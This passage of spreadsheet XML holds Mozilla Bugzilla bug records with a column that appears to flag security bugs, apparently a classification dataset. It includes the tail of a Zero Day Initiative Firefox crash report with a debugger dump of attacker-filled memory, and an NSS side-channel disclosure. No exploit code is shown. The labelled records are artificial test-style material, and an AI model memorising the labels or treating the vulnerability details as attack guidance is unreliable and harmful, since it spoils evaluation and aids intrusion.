007af5a4 5e9d5f7c 0ac5e340 007af714 007af730 xul!nsAppStartup::Run+0x20 (FPO: [1,0,0]) (CONV: stdcall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\components\startup\nsappstartup.cpp @ 282]
007af680 5e9d6e6f 00000001 007af858 03a42160 xul!XREMain::XRE_mainRun+0x499 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4228]
007af69c 5ea8336b 00000000 018c5ff8 007af800 xul!XREMain::XRE_main+0x1b6 (FPO: [3,2,0]) (CONV: thiscall) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4308]
007af810 00101635 00000001 018c5ff8 007af858 xul!XRE_main+0x3e (FPO: [4,87,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nsapprunner.cpp @ 4528]
007af9a4 001012dc 03a42160 018c9ff8 ffffc000 firefox!do_main+0x125 (FPO: [1,92,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\browser\app\nsbrowserapp.cpp @ 294]
007afa38 001010dc 001024f1 001024f1 007afa94 firefox!NS_internal_main+0xec (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\browser\app\nsbrowserapp.cpp @ 669]
007afa4c 00102474 018c5ff8 0186ff98 01871f70 firefox!wmain+0xbc (FPO: [2,0,0]) (CONV: cdecl) [c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\toolkit\xre\nswindowswmain.cpp @ 124]
007afa94 76274198 7f51d000 76274170 c98e43d2 firefox!__tmainCRTStartup+0xfe (FPO: [Non-Fpo]) (CONV: cdecl) [f:\dd\vctools\crt\crtw32\startup\crt0.c @ 255]
007afaa8 770f32b1 7f51d000 7498c8a6 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo])
007afaf0 770f327f ffffffff 7711f08b 00000000 ntdll!__RtlUserThreadStart+0x2b (FPO: [SEH])
007afb00 00000000 001024f1 7f51d000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])
0:000&gt; !lmi xul
Loaded Module Info: [xul]
         Module: xul
   Base Address: 5e520000
     Image Name: C:\Program Files\Mozilla Firefox\xul.dll
   Machine Type: 332 (I386)
     Time Stamp: 55541969 Wed May 13 20:41:29 2015
           Size: 2268000
       CheckSum: 21a3860
Characteristics: 2122   
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    76, 1bff998, 1bfe198 RSDS - GUID: {77095B44-069F-4E0E-B81F-F5E718AEA6C9}
               Age: 2, Pdb: c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\toolkit\library\xul.pdb
                   ??    14, 1bffa10, 1bfe210 [Data not mapped]
                CLSID     4, 1bffa24, 1bfe224 [Data not mapped]
     Image Type: FILE     - Image read successfully from debugger.
                 C:\Program Files\Mozilla Firefox\xul.dll
    Symbol Type: PDB      - Symbols loaded successfully from image path.
                 z:\export\symbols\xul.pdb\77095B44069F4E0EB81FF5E718AEA6C92\xul.pdb
       Compiler: Linker - front end [0.0 bld 0] - back end [12.0 bld 30723]
    Load Report: private symbols &amp; lines, source indexed
                 z:\export\symbols\xul.pdb\77095B44069F4E0EB81FF5E718AEA6C92\xul.pdb
0:000&gt; lmvm xul
start    end        module name
5e520000 60788000   xul        (private pdb symbols)  z:\export\symbols\xul.pdb\77095B44069F4E0EB81FF5E718AEA6C92\xul.pdb
    Loaded symbol image file: C:\Program Files\Mozilla Firefox\xul.dll
    Image path: C:\Program Files\Mozilla Firefox\xul.dll
    Image name: xul.dll
    Timestamp:        Wed May 13 20:41:29 2015 (55541969)
    CheckSum:         021A3860
    ImageSize:        02268000
    File version:     38.0.1.5611
    Product version:  38.0.1.5611
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Foundation
    ProductName:      Firefox
    InternalName:     Firefox
    OriginalFilename: xul.dll
    ProductVersion:   38.0.1
    FileVersion:      38.0.1
    FileDescription:  38.0.1
    LegalCopyright:   License: MPL 2
    LegalTrademarks:  Mozilla
    Comments:         Mozilla
0:000&gt; !lmi firefox
Loaded Module Info: [firefox]
         Module: firefox
   Base Address: 00100000
     Image Name: firefox.exe
   Machine Type: 332 (I386)
     Time Stamp: 55540a1a Wed May 13 19:36:10 2015
           Size: 5f000
       CheckSum: 676cb
Characteristics: 122   
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    76, 19a1c,   18a1c RSDS - GUID: {DEF0A7B6-E41C-4723-87E8-80346BEC2FA0}
               Age: 2, Pdb: c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\browser\app\firefox.pdb
                   ??    14, 19a94,   18a94 [Data not mapped]
                CLSID     4, 19aa8,   18aa8 [Data not mapped]
     Image Type: FILE     - Image read successfully from debugger.
                 C:\Program Files\Mozilla Firefox\firefox.exe
    Symbol Type: PDB      - Symbols loaded successfully from image path.
                 z:\export\symbols\firefox.pdb\DEF0A7B6E41C472387E880346BEC2FA02\firefox.pdb
       Compiler: Linker - front end [0.0 bld 0] - back end [12.0 bld 30723]
    Load Report: private symbols &amp; lines, source indexed
                 z:\export\symbols\firefox.pdb\DEF0A7B6E41C472387E880346BEC2FA02\firefox.pdb
0:000&gt; lmvm firefox
start    end        module name
00100000 0015f000   firefox    (private pdb symbols)  z:\export\symbols\firefox.pdb\DEF0A7B6E41C472387E880346BEC2FA02\firefox.pdb
    Loaded symbol image file: C:\Program Files\Mozilla Firefox\firefox.exe
    Image path: firefox.exe
    Image name: firefox.exe
    Timestamp:        Wed May 13 19:36:10 2015 (55540A1A)
    CheckSum:         000676CB
    ImageSize:        0005F000
    File version:     38.0.1.5611
    Product version:  38.0.1.0
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Corporation
    ProductName:      Firefox
    InternalName:     Firefox
    OriginalFilename: firefox.exe
    ProductVersion:   38.0.1
    FileVersion:      38.0.1
    FileDescription:  Firefox
    LegalCopyright:   ©Firefox and Mozilla Developers; available under the MPL 2 license.
    LegalTrademarks:  Firefox is a Trademark of The Mozilla Foundation.
    Comments:         Firefox is a Trademark of The Mozilla Foundation.
0:000&gt; dc @ebp
03a4c300  91919191 91919191 91919191 91919191  ................
03a4c310  91919191 91919191 91919191 91919191  ................
03a4c320  91919191 91919191 91919191 91919191  ................
03a4c330  91919191 91919191 91919191 91919191  ................
03a4c340  91919191 91919191 91919191 91919191  ................
03a4c350  91919191 91919191 91919191 91919191  ................
03a4c360  91919191 91919191 91919191 91919191  ................
03a4c370  91919191 91919191 91919191 91919191  ................
```
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   Anonymous working with HP's Zero Day Initiative</t>
        </is>
      </c>
      <c r="X2666" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2667">
      <c r="A2667" t="n">
        <v>681074</v>
      </c>
      <c r="B2667" t="inlineStr">
        <is>
          <t>2011-08-22 14:48:36 -0700</t>
        </is>
      </c>
      <c r="C2667" t="inlineStr">
        <is>
          <t>Change "pending..." to "Non-Vouched" in search results string</t>
        </is>
      </c>
      <c r="D2667" t="inlineStr">
        <is>
          <t>2012-04-19 20:14:18 -0700</t>
        </is>
      </c>
      <c r="E2667" t="n">
        <v>1</v>
      </c>
      <c r="F2667" t="n">
        <v>1</v>
      </c>
      <c r="G2667" t="n">
        <v>5</v>
      </c>
      <c r="H2667" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2667" t="inlineStr">
        <is>
          <t>Participation Infrastructure</t>
        </is>
      </c>
      <c r="J2667" t="inlineStr">
        <is>
          <t>Phonebook</t>
        </is>
      </c>
      <c r="K2667" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2667" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2667" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2667" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2667" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2667" t="inlineStr"/>
      <c r="Q2667" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2667" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2667" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2667" t="n">
        <v>1</v>
      </c>
      <c r="U2667" t="n">
        <v>0</v>
      </c>
      <c r="V2667" t="n">
        <v>3</v>
      </c>
      <c r="W2667" t="inlineStr">
        <is>
          <t>Steps to Reproduce:
1. Go to https://mozillians-dev.allizom.org/en-US/search
2. Search for "Mozilla"
Actual Results:
"Pending..." is used for non-vouched mozillians and it sends the idea that I'm going to be seeing something change on the page. It won't and it's just a static state of what type of account that result is.
Expected Results:
The text should read "Non-Vouched" instead.</t>
        </is>
      </c>
      <c r="X2667" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2668">
      <c r="A2668" t="n">
        <v>988971</v>
      </c>
      <c r="B2668" t="inlineStr">
        <is>
          <t>2014-03-27 10:46:33 -0700</t>
        </is>
      </c>
      <c r="C2668" t="inlineStr">
        <is>
          <t>Replace Classic with "Sandstone" skin as Standard skin</t>
        </is>
      </c>
      <c r="D2668" t="inlineStr">
        <is>
          <t>2016-09-29 13:18:08 -0700</t>
        </is>
      </c>
      <c r="E2668" t="n">
        <v>1</v>
      </c>
      <c r="F2668" t="n">
        <v>1</v>
      </c>
      <c r="G2668" t="n">
        <v>4</v>
      </c>
      <c r="H2668" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2668" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2668" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K2668" t="inlineStr">
        <is>
          <t>4.5.2</t>
        </is>
      </c>
      <c r="L2668" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2668" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2668" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2668" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2668" t="inlineStr"/>
      <c r="Q2668" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2668" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2668" t="inlineStr">
        <is>
          <t>Bugzilla 6.0</t>
        </is>
      </c>
      <c r="T2668" t="n">
        <v>1</v>
      </c>
      <c r="U2668" t="n">
        <v>0</v>
      </c>
      <c r="V2668" t="n">
        <v>35</v>
      </c>
      <c r="W2668" t="inlineStr">
        <is>
          <t>The default skin on bugzilla.mozilla.org is called Sandstone due to the similarities to the Sandstone Mozilla.org theme in use at the time. Several people have requested that the skin be made available in the upstream Bugzilla code so this bug is about tracking that.
Currently the following things will need to be taken into account when porting.
1. All of the CSS is located in skins/contrib/Mozilla/global.css and will need to be broken out into individual files such as global.css, enter_bug.css, show_bug.css, buglist.css, etc.
2. Changes are needed in to the global/header.html.tmpl specifically for the Sandstone skin currently. We either need to port those changes as-is or make changes to the standard header template that allows for all skins to share the same HTML and have the Sandstone skin achieve the same look using pure CSS and/or jscript.
3. The footer needs much improvement. One of the eventual goals of the Mozilla skin is to convert the save queries and other actions into vertical lists or drop down menus to make the footer cleaner.
If someone wants to take this one that would be great, otherwise BMO devels will be able to work on this after our other goals are completed.
dkl</t>
        </is>
      </c>
      <c r="X2668" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2669">
      <c r="A2669" t="n">
        <v>1623116</v>
      </c>
      <c r="B2669" t="inlineStr">
        <is>
          <t>2020-03-17 09:50:22 -0700</t>
        </is>
      </c>
      <c r="C2669" t="inlineStr">
        <is>
          <t>P-384 and P-521 implementation uses a side-channel vulnerable modular inversion function</t>
        </is>
      </c>
      <c r="D2669" t="inlineStr">
        <is>
          <t>2021-11-22 23:27:53 -0800</t>
        </is>
      </c>
      <c r="E2669" t="n">
        <v>1</v>
      </c>
      <c r="F2669" t="n">
        <v>1</v>
      </c>
      <c r="G2669" t="n">
        <v>3</v>
      </c>
      <c r="H2669" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2669" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2669" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2669" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2669" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2669" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2669" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2669" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2669" t="inlineStr">
        <is>
          <t>[disclosure date 2020-07-28][adv-main80+]</t>
        </is>
      </c>
      <c r="Q2669" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2669" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2669" t="inlineStr">
        <is>
          <t>3.55</t>
        </is>
      </c>
      <c r="T2669" t="n">
        <v>1</v>
      </c>
      <c r="U2669" t="n">
        <v>0</v>
      </c>
      <c r="V2669" t="n">
        <v>30</v>
      </c>
      <c r="W2669" t="inlineStr">
        <is>
          <t>Mail to security@ from Alejandro Cabrera Aldaya:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
We recently dig into how the EC projective coordinates attack proposed in [1] could affect NSS.
The attack in [1] aims at recover some bits of the scalar starting from the projective representation
of an scalar multiplication output point.
Schemes like ECDSA are very sensitive to scalar leaks, therefore the attack in [1] can thwarts the security of an implementation if the attacker knows the projective representation of the product kG in ECDSA.
The success rate of the attack proposed in [1] depends on several factors such as:
* Elliptic curve form (Weierstrass, Montogmery, etc.)
* The finite field over the curve is defined
* Projective coordinates (Jacobian, Mxy, etc.)
* Scalar multiplication algorithm
making a high-demand time-consuming task to assess the real threat of this attack on implementation.
During our analysis to several cryptographic libraries we focused on NIST curve P-256 code paths and have found that your library is potentially vulnerable because the projective to affine coordinates conversion uses a side-channel vulnerable modular inversion function.
Considering the number of freedom degrees and potential threats we recommend to use one of the following countermeasures to prevent an already existing vulnerability or a future introduced one if one of the listed factors changes.
Countermeasures:
- Coordinates randomization after scalar multiplication but just before coordinates conversion takes place.
- Using FLT to invert Z instead of binary GCD based algorithms during coordinates conversion.
[1] - Naccache et al. - "Projective coordinates leak" - https://eprint.iacr.org/2003/191
The results of our research is going to be published at CHES.
If you wan't to assign a CVE, please let us know to include it a reference in the paper.</t>
        </is>
      </c>
      <c r="X2669" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2670">
      <c r="A2670" t="n">
        <v>87406</v>
      </c>
      <c r="B2670" t="inlineStr">
        <is>
          <t>2001-06-22 22:32:36 -0700</t>
        </is>
      </c>
      <c r="C2670" t="inlineStr">
        <is>
          <t>Make Bugzilla work with mod_perl (under Apache)</t>
        </is>
      </c>
      <c r="D2670" t="inlineStr">
        <is>
          <t>2014-04-26 03:09:24 -0700</t>
        </is>
      </c>
      <c r="E2670" t="n">
        <v>1</v>
      </c>
      <c r="F2670" t="n">
        <v>1</v>
      </c>
      <c r="G2670" t="n">
        <v>4</v>
      </c>
      <c r="H2670" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2670" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2670" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2670" t="inlineStr">
        <is>
          <t>2.13</t>
        </is>
      </c>
      <c r="L2670" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2670" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2670" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2670" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2670" t="inlineStr"/>
      <c r="Q2670" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2670" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2670" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T2670" t="n">
        <v>1</v>
      </c>
      <c r="U2670" t="n">
        <v>24</v>
      </c>
      <c r="V2670" t="n">
        <v>17</v>
      </c>
      <c r="W2670" t="inlineStr">
        <is>
          <t>With this bug I'm following up on the posts from Richard Walters in .webtools.
It is meant to track all the work required to make Bugzilla work with mod_perl.</t>
        </is>
      </c>
      <c r="X2670" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2671">
      <c r="A2671" t="n">
        <v>773097</v>
      </c>
      <c r="B2671" t="inlineStr">
        <is>
          <t>2012-07-11 17:08:00 -0700</t>
        </is>
      </c>
      <c r="C2671" t="inlineStr">
        <is>
          <t>crash in gfxContext::~gfxContext()</t>
        </is>
      </c>
      <c r="D2671" t="inlineStr">
        <is>
          <t>2022-08-04 19:48:56 -0700</t>
        </is>
      </c>
      <c r="E2671" t="n">
        <v>1</v>
      </c>
      <c r="F2671" t="n">
        <v>1</v>
      </c>
      <c r="G2671" t="n">
        <v>3</v>
      </c>
      <c r="H2671" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2671" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2671" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K2671" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2671" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2671" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2671" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2671" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2671" t="inlineStr">
        <is>
          <t>[startupcrash][advisory-tracking+] [qa?]</t>
        </is>
      </c>
      <c r="Q2671" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2671" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2671" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T2671" t="n">
        <v>1</v>
      </c>
      <c r="U2671" t="n">
        <v>1</v>
      </c>
      <c r="V2671" t="n">
        <v>85</v>
      </c>
      <c r="W2671" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-0101e134-9558-4f01-97f2-18c332120710 .
============================================================= 
Found when looking at crash stats for the webapp runtime. Don't have reproduction steps for this.</t>
        </is>
      </c>
      <c r="X2671" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2672">
      <c r="A2672" t="n">
        <v>789652</v>
      </c>
      <c r="B2672" t="inlineStr">
        <is>
          <t>2012-09-07 20:08:11 -0700</t>
        </is>
      </c>
      <c r="C2672" t="inlineStr">
        <is>
          <t>schedule B2G builds to be tested within emulator-with-codecs</t>
        </is>
      </c>
      <c r="D2672" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E2672" t="n">
        <v>1</v>
      </c>
      <c r="F2672" t="n">
        <v>1</v>
      </c>
      <c r="G2672" t="n">
        <v>5</v>
      </c>
      <c r="H2672" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2672" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2672" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2672" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2672" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2672" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2672" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2672" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2672" t="inlineStr">
        <is>
          <t>[b2g][testing]</t>
        </is>
      </c>
      <c r="Q2672" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2672" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2672" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2672" t="n">
        <v>1</v>
      </c>
      <c r="U2672" t="n">
        <v>0</v>
      </c>
      <c r="V2672" t="n">
        <v>25</v>
      </c>
      <c r="W2672" t="inlineStr">
        <is>
          <t>per meeting w/cjones, jgriffin:
Once emulator toolchain is deployed, bug#789651, then we should be able to schedule tests run on each of the Armv7a ICS Opt/Debug builds. This bug is to track enabling those tests run per build.
cjones/jgriffin: For each of Opt, Debug builds, can you give us a list of which the test suites are expected to run green, so we know which testsuites to schedule and display on tbpl.m.o?</t>
        </is>
      </c>
      <c r="X2672" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2673">
      <c r="A2673" t="n">
        <v>584180</v>
      </c>
      <c r="B2673" t="inlineStr">
        <is>
          <t>2010-08-03 13:53:56 -0700</t>
        </is>
      </c>
      <c r="C2673" t="inlineStr">
        <is>
          <t>SJOWs create scope chains ending in outer objects</t>
        </is>
      </c>
      <c r="D2673" t="inlineStr">
        <is>
          <t>2010-10-21 23:06:13 -0700</t>
        </is>
      </c>
      <c r="E2673" t="n">
        <v>1</v>
      </c>
      <c r="F2673" t="n">
        <v>1</v>
      </c>
      <c r="G2673" t="n">
        <v>3</v>
      </c>
      <c r="H2673" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2673" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2673" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2673" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2673" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2673" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2673" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2673" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2673" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2673" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2673" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2673" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2673" t="n">
        <v>1</v>
      </c>
      <c r="U2673" t="n">
        <v>0</v>
      </c>
      <c r="V2673" t="n">
        <v>14</v>
      </c>
      <c r="W2673" t="inlineStr">
        <is>
          <t>A SJOW around an outer window creates a scope function parented directly to the outer window's global object, which is... the outer window.
I don't know if this is exploitable, but it's definitely hitting us on bug 581539, because window.postMessage indirectly depends on the scope chain ending in an inner object.</t>
        </is>
      </c>
      <c r="X2673" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2674">
      <c r="A2674" t="n">
        <v>1234147</v>
      </c>
      <c r="B2674" t="inlineStr">
        <is>
          <t>2015-12-21 01:23:14 -0800</t>
        </is>
      </c>
      <c r="C2674" t="inlineStr">
        <is>
          <t>crash in js::jit::JitcodeGlobalTable::allocateTower &amp; js::GetOwnPropertyDescriptor</t>
        </is>
      </c>
      <c r="D2674" t="inlineStr">
        <is>
          <t>2017-03-29 20:31:40 -0700</t>
        </is>
      </c>
      <c r="E2674" t="n">
        <v>1</v>
      </c>
      <c r="F2674" t="n">
        <v>1</v>
      </c>
      <c r="G2674" t="n">
        <v>3</v>
      </c>
      <c r="H2674" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2674" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2674" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2674" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2674" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2674" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2674" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2674" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2674" t="inlineStr">
        <is>
          <t>[adv-main47+][adv-esr45.2+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2674" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2674" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2674" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T2674" t="n">
        <v>1</v>
      </c>
      <c r="U2674" t="n">
        <v>0</v>
      </c>
      <c r="V2674" t="n">
        <v>50</v>
      </c>
      <c r="W2674" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-43b8d14d-1e00-4699-a388-4d1852151216 and
report bp-55fff57e-07a8-4f8d-9e78-a839f2151221
=============================================================
Leaving my Firefox during the week end, it is quite common that it is crashed when I am coming back.
Even the signatures are different, I am grouping then as the context in which they appears are similar.
In the terminal, I can see:
console.error: 
  Could not write session state file 
  out of memory
undefined
console.error: _bugzillajs: 
  out of memory
console.error: _bugzillajs: 
  out of memory
console.error: 
  Could not write session state file 
  out of memory
undefined
console.error: 
console.error: 
console.error: 
console.error: 
console.error: 
console.error: 
console.error: 
console.error: 
console.error: 
  out of memory
console.error: 
  out of memory
console.error: 
console.error: 
  out of memory
console.error: 
console.error: _bugzillajs: 
  out of memory
console.error: _bugzillajs: 
  out of memory
console.error: _bugzillajs: 
  out of memory
console.error: _bugzillajs: 
  out of memory</t>
        </is>
      </c>
      <c r="X2674" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2675">
      <c r="A2675" t="n">
        <v>756415</v>
      </c>
      <c r="B2675" t="inlineStr">
        <is>
          <t>2012-05-18 04:05:41 -0700</t>
        </is>
      </c>
      <c r="C2675" t="inlineStr">
        <is>
          <t>Addon pages aren't showing the latest versions</t>
        </is>
      </c>
      <c r="D2675" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E2675" t="n">
        <v>1</v>
      </c>
      <c r="F2675" t="n">
        <v>1</v>
      </c>
      <c r="G2675" t="n">
        <v>6</v>
      </c>
      <c r="H2675" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2675" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J2675" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K2675" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2675" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2675" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2675" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2675" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2675" t="inlineStr"/>
      <c r="Q2675" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2675" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2675" t="inlineStr">
        <is>
          <t>2012-05-24</t>
        </is>
      </c>
      <c r="T2675" t="n">
        <v>1</v>
      </c>
      <c r="U2675" t="n">
        <v>0</v>
      </c>
      <c r="V2675" t="n">
        <v>6</v>
      </c>
      <c r="W2675" t="inlineStr">
        <is>
          <t>The public addon pages aren't being updated with the latest approved versions.
I've checked a number of addons from https://addons.mozilla.org/en-US/editors/reviewlog that were reviewed since the push yesterday and none of the fully reviewed updates or preliminary reviewed updates are being reflected.  Nomination approvals appear to be working.
e.g. 
https://addons.mozilla.org/en-US/firefox/addon/space-next/
https://addons.mozilla.org/en-US/firefox/addon/greasefire/
https://addons.mozilla.org/en-US/firefox/addon/firemath/
https://addons.mozilla.org/en-US/firefox/addon/tm-live/
This means users will be downloading old versions of addons if they go to the site.  Updates via the API seem to be unaffected.</t>
        </is>
      </c>
      <c r="X2675" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2676">
      <c r="A2676" t="n">
        <v>668229</v>
      </c>
      <c r="B2676" t="inlineStr">
        <is>
          <t>2011-06-29 08:40:31 -0700</t>
        </is>
      </c>
      <c r="C2676" t="inlineStr">
        <is>
          <t>Review dashboard should look more like thread list</t>
        </is>
      </c>
      <c r="D2676" t="inlineStr">
        <is>
